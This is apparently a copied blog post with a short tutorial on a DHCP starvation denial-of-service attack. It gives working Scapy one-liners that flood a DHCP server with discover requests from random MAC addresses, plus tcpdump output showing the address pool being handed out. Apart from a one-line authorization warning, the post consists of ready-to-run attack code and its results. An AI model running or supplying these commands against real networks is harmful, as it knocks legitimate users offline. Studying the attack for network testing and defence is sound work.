====== DHCP DoS with scapy ======
 
 * http://funoverip.net/2010/12/dhcp-denial-of-service-with-scapy/
 * http://hakipedia.com/index.php/Category:Network_Security

DHCP Denial of Service with scapy
by foip on December 9th, 2010
===== 1. Introduction =====


This is a small post explaining how to run a starvation attack against a DHCP server with only three lines of code (thanks to Scapy!).

Information & download regarding Scapy :

    http://www.secdev.org/projects/scapy/

Information about DHCP Starvation attack :

    http://hakipedia.com/index.php/DHCP_Starvation


===== 2. Starvation attack with scapy =====


Running a starvation attack is nothing more than sending a lot of dummy DHCP requests, with random source MAC addresses. After few second, there is no more IP addresses available in the pool.

Warning: Don’t run this attack against networks you are not authorized !

This is to test against single host (note the new scapy version and the DST in IP package)
<code python>
[root@localhost scapy-2.1.0]# ./run_scapy 
INFO: Can't import python gnuplot wrapper . Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.1.0)

>>> conf.checkIPaddr = False
>>> dhcp_request= Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="10.0.8.174")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_request,loop=0)
</code>

This is the ATTACK!
<code>
[root@host1 ]$ scapy
Welcome to Scapy (v1.1.1 / -)
>>> conf.checkIPaddr = False
>>> dhcp_discover =  Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_discover,loop=1)
...............................................................^C
Sent 70 packets.
</code>

>>> interesting
To stop the attack, simply press Ctrl+C.



Does it work ? Yes, take a look at the following tcpdump captures.
==== 2.1. The DHCP queries: ====


[root@host2 ]$ tcpdump -n -e -i eth0 port 68
ec:51:e2:20:5b:93 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 64:38:62:38:63:65, length 244
8e:97:0f:18:8a:19 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 39:33:39:37:65:66, length 244
28:a7:45:35:c0:47 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 38:34:66:64:33:63, length 244
...


==== 2.2. Then the DHCP responses: ====


00:23:20:56:53:f0 > 64:38:62:38:63:65, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.117.68: BOOTP/DHCP, Reply, length 305
00:23:20:56:53:f0 > 39:33:39:37:65:66, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.118.68: BOOTP/DHCP, Reply, length 305
00:23:20:56:53:f0 > 38:34:66:64:33:63, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.119.68: BOOTP/DHCP, Reply, length 305
...
 

===== 3. The End =====


Hope you enjoy.